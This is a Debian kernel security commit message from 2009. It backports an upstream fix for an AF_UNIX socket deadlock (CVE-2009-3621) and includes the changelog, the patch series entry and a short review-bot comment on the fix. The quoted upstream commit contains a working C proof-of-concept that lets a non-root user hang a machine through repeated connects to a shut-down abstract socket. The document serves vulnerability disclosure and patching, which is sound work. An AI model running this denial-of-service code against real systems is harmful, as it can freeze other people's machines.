[kernel] r14475 - in dists/lenny-security/linux-2.6/debian: . patches/bugfix/all patches/series

Dann Frazier dannf at alioth.debian.org
Wed Oct 28 04:25:04 UTC 2009


Author: dannf
Date: Wed Oct 28 04:25:02 2009
New Revision: 14475

Log:
AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)

Added:
   dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
Modified:
   dists/lenny-security/linux-2.6/debian/changelog
   dists/lenny-security/linux-2.6/debian/patches/series/19lenny2

Modified: dists/lenny-security/linux-2.6/debian/changelog
==============================================================================
--- dists/lenny-security/linux-2.6/debian/changelog	Wed Oct 28 04:23:09 2009	(r14474)
+++ dists/lenny-security/linux-2.6/debian/changelog	Wed Oct 28 04:25:02 2009	(r14475)
@@ -5,6 +5,7 @@
   * netlink: fix typo in initialization (CVE-2009-3612)
   * drm/r128: Add test for initialisation to all ioctls that require it
     (CVE-2009-3620)
+  * AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)
 
  -- dann frazier <dannf at debian.org>  Tue, 27 Oct 2009 21:33:02 -0600
 

Added: dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
==============================================================================
--- /dev/null	00:00:00 1970	(empty, because file is newly added)
+++ dists/lenny-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch	Wed Oct 28 04:25:02 2009	(r14475)
@@ -0,0 +1,83 @@
+commit 77238f2b942b38ab4e7f3aced44084493e4a8675
+Author: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+Date:   Sun Oct 18 23:17:37 2009 -0700
+
+    AF_UNIX: Fix deadlock on connecting to shutdown socket
+    
+    I found a deadlock bug in UNIX domain socket, which makes able to DoS
+    attack against the local machine by non-root users.
+    
+    How to reproduce:
+    1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
+        namespace(*), and shutdown(2) it.
+     2. Repeat connect(2)ing to the listening socket from the other sockets
+        until the connection backlog is full-filled.
+     3. connect(2) takes the CPU forever. If every core is taken, the
+        system hangs.
+    
+    PoC code: (Run as many times as cores on SMP machines.)
+    
+    int main(void)
+    {
+    	int ret;
+    	int csd;
+    	int lsd;
+    	struct sockaddr_un sun;
+    
+    	/* make an abstruct name address (*) */
+    	memset(&sun, 0, sizeof(sun));
+    	sun.sun_family = PF_UNIX;
+    	sprintf(&sun.sun_path[1], "%d", getpid());
+    
+    	/* create the listening socket and shutdown */
+    	lsd = socket(AF_UNIX, SOCK_STREAM, 0);
+    	bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
+    	listen(lsd, 1);
+    	shutdown(lsd, SHUT_RDWR);
+    
+    	/* connect loop */
+    	alarm(15); /* forcely exit the loop after 15 sec */
+    	for (;;) {
+    		csd = socket(AF_UNIX, SOCK_STREAM, 0);
+    		ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
+    		if (-1 == ret) {
+    			perror("connect()");
+    			break;
+    		}
+    		puts("Connection OK");
+    	}
+    	return 0;
+    }
+    
+    (*) Make sun_path[0] = 0 to use the abstruct namespace.
+        If a file-based socket is used, the system doesn't deadlock because
+        of context switches in the file system layer.
+    
+    Why this happens:
+     Error checks between unix_socket_connect() and unix_wait_for_peer() are
+     inconsistent. The former calls the latter to wait until the backlog is
+     processed. Despite the latter returns without doing anything when the
+     socket is shutdown, the former doesn't check the shutdown state and
+     just retries calling the latter forever.
+    
+    Patch:
+     The patch below adds shutdown check into unix_socket_connect(), so
+     connect(2) to the shutdown socket will return -ECONREFUSED.
+    
+    Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+    Signed-off-by: Masanori Yoshida <masanori.yoshida.tv at hitachi.com>
+    Signed-off-by: David S. Miller <davem at davemloft.net>
+
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 51ab497..fc820cd 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1074,6 +1074,8 @@ restart:
+ 	err = -ECONNREFUSED;
+ 	if (other->sk_state != TCP_LISTEN)
+ 		goto out_unlock;
++	if (other->sk_shutdown & RCV_SHUTDOWN)
++		goto out_unlock;
+ 
+ 	if (unix_recvq_full(other)) {
+ 		err = -EAGAIN;
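Review bot: the added `if (other->sk_shutdown & RCV_SHUTDOWN) goto out_unlock;` sits after `err = -ECONNREFUSED;` and the `TCP_LISTEN` test, so it reuses that error value and a connect(2) to a shut-down listener now fails immediately instead of retrying from `restart:`; this matches the description's intent, where `-ECONREFUSED` is a typo for `-ECONNREFUSED`. Two things to confirm when backporting: the check tests only `RCV_SHUTDOWN`, which covers the SHUT_RDWR reproducer in the description but not a listener shut down with SHUT_WR alone, and the wait-side function the description says already returns on shutdown (`unix_wait_for_peer()`) is not part of this hunk, so its behaviour on the lenny tree should be checked against this condition rather than assumed from the upstream commit.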

Modified: dists/lenny-security/linux-2.6/debian/patches/series/19lenny2
==============================================================================
--- dists/lenny-security/linux-2.6/debian/patches/series/19lenny2	Wed Oct 28 04:23:09 2009	(r14474)
+++ dists/lenny-security/linux-2.6/debian/patches/series/19lenny2	Wed Oct 28 04:25:02 2009	(r14475)
@@ -2,3 +2,4 @@
 + bugfix/all/random-make-get_random_int-more-random.patch
 + bugfix/all/netlink-fix-typo-in-initialization.patch
 + bugfix/all/drm+r128-Add-test-for-init-to-all-reqd-ioctls.patch
++ bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
